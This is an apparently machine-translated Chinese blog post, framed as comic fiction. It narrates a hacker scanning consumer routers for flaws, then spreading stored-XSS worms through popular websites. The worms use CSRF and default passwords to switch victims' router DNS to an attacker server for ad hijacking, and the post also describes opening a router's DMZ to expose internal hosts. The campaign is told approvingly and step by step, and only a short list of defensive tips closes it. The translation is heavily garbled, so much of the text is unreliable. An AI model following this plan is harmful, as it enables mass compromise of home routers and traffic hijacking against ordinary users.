Huang Xiaohun 2013/10/31 12:13
0x00 Environment Analysis
The e recent explosion of D-link back door let everyone panic. Good thing I don’t use d-Link, so we’re done? Will the user be able to fix the bug, and will the manufacturer be able to notify the user in time to prevent being shot? Obviously, no one did.
First of all, as long as the XXX vulnerability in XXX routing is announced, it will discredit their own company. First of all, users will not upgrade (who is so boring to update the firmware of the router when they have normal Internet access? “, and put pr pressure on the company, which no one else would do.
So we can sum up a few points:
Users will not fix the router bug! The manufacturer doesn’t want to fix it! Users are too lazy to fill!
Where does the 0x01 vulnerability come from
Router vulnerabilities are rare. Most of them are remote command execution and backdoor, XSS, etc., but they are all remote command execution in Daniu’s hands, which basically covers X section. X is the oil route device commonly used in the machine room.
But for those ordinary diaosi black rich, I am not interested in APT, I prefer those girl’s router.
So, black broad to the computer square, came to the router wholesale department, took out 50 dollars to the boss, tell the boss, I want to try your hot selling router performance. The boss see in the face of the RMB, took 20 to the router to black wide, black wide see the router smiled, exposed big gold teeth, hold up a few WVS is crazy sweep, and then according to the model carefully record loopholes.
In this way, the blogger spent less than 200 RMB a day, but recorded all kinds of bugs in the mainstream routers in China (→*→, really a slutty guy).
0x02 The emergence of evil forces
After that black broad finish scanning, satisfied of close notebook, router boss still in the heart dark cool, earned a silly force of money… What he didn’t know was that this was the beginning of the game.
Rushed to attack a day, the silk ash wide sat down in a fry powder stall by the roadside, looking at the peripheral to move brick of the workers, there is always a kind of friendly feeling in the heart, looking at the foreman to open BMW far away of the figure, black broad determination to continue to work hard, anger day roar: boss, two fry powder to add meat!!
After eat full, gray broad go to a table game of the store, chose a quiet corner, why go to table games… He told me that the table game 75 RMB 6 hours, unlimited beverage refill, the important thing is that there is 20M wifi, and those tuhao are to accompany sister to play table games, no one with him to grab the speed of the Internet, the air is dozens of times better than the Internet bar, lu code didn’t think of the time can also see next to the beautiful girl (→*→, ah. I just want to say, please take me next time!!)
Black kuo opened the computer, began to pick up the greasy keyboard, opened several WVS reports, picked out the command execution, CSRF, XSS, and unauthorized access and other vulnerabilities for classification, and marked whether controllable, also put each function post,get package for sorting.
Just like that… A generic routing vulnerability library would do the trick…
These vulnerabilities were put into their own XSS platform and several rules were planned. Use the title to determine the brand of the router, and then compare the model… For various postures, the controllable CSRF is inserted directly into the route, and if not, the default password is inserted, he told me… In fact, the chance of inserting directly is very small, but the chance of inserting through CSRF with default password is very high… (Here shows the awareness of routing security to improve, do not think you can not plug in the Intranet… Default password has not changed the posture to insert you)
There are many different ways to penetrate routers, but the DMZ and DNS are the ones that most people are concerned about.
For example, one uses CSRF to turn on the router’s DMZ function, exposing the target host to the public network…
It takes more than bullets to fire a gun, it takes a gun
The last time I went to computer plaza, I spent hundreds of dollars, which made black kuo’s life a little bit tight. These days, I moved his XSS platform to a relatively high quality VPS in Japan. He was afraid of heavy traffic behind him. (Oh, Daniel had the foresight.)
Hei Kuo pinched pennies and skipped the fried noodles this week. A few big steamed bread to send water every day, finally saved a sum of money, in the United States rented a server, spent a night to install the server as a DNS server, black wide exposed his big gold teeth, ha ha of sleep.
The early dawn is always the quietest
These days I start to play jet lag, sleep during the day, play video games at night, or go out to barbecue with gay friends, and change the infiltration time to night.
Every day when you go online, look for big sites, and find places where users and sites can interact and submit data, and write it down. Late at night, we started various bypass, and then construct worms, worms into the black wide XSS platform, in the transmission of time do not forget to force the router to a round!!
Late at night, the operation and maintenance guy is still asleep, and the development guy is still on the girl’s bed… So black wide after the worm first do not trigger, until the user on-line rate is relatively high, (such as 8 in the morning to 10:30, 11:30 to 1:00 at noon, 8 in the evening to 10:30), trigger the storage XSS found a few days ago.
These days of daytime black kuo did not stop, looking around for all kinds of advertising, many people questioned his ability to find so much traffic. Black broad just ha ha smile, silently take the list.
0x05 Suddenly like a night spring breeze, thousands of trees chrysanthemum open
Black broad in order to ensure the validity of their own tests, directly at midnight began to deploy the platform, the XSS platform rules into full DNS hijacking, mainly controllable CSRF to change the router’s DNS, not controllable directly with the default password test… Different router brands and models correspond to different rules. So, as the first person to see the worm, forwarded the worm in the same domain, and then the number of infected people increased by several times, and the victim’s router was hacked and changed to the DNS server he rented in the United States, which pointed to the AD address… At 10 o ‘clock in the morning, looking at the PV of the advertisement showed geometric multiple growth, black kuo again revealed his big gold teeth 😀
A month later, black wide open his super run past his once site, looked at the foreman foreman that familiar back ha Ha ha a smile to drive away, because black wide worms are not like white hat loaded force, must play a window to tell others I put you. Instead, it continues to propagate in the background, making it difficult for administrators to detect (except for monitoring platforms)…
0 x06 summary
Most of the time, there are a lot of vulnerabilities in the router, especially in the known target device for planned APT activities, such as the known target host is on the internal network, and see the router is xx-Link brand and model, black and wide directly use XSS to open the router DMZ, the target host will be directly exposed to the external network.
What does this say? Let’s list a few things:
1. Change the default password and route address of the router (for example, change 192.168.1.1 to 192.168.30.1) to prevent CSRF to a large extent.
2. Don’t visit bad websites, even if you do, but be sure to check your data regularly for malicious changes, such as the XSS worm.
3. Telecom has also made some interception for the router, as long as it is when the telecom user’s DNS points to a foreign server, some areas of telecom will pop up prompt DNS has been modified… This is just some areas, other places I don’t know, netcom and Unicom don’t seem to have this function at the time of writing.
4. Try not to visit sites that have sex, you know, because they don’t just make traffic money… Try not to use Internet Explorer though if you can’t help it. Download the action movies when you can. Or in a virtual machine.
5 ready for the double eleven, Taobao various activities, install a soft kill bar, estimate black rich people are expanding the server, but also afraid of traffic is too large… So take more precautions around Double Eleven!!
Hereby declare: this story is pure fiction, please do not use it for illegal purposes, the consequences caused have nothing to do with the author of this article. Daniel’s spray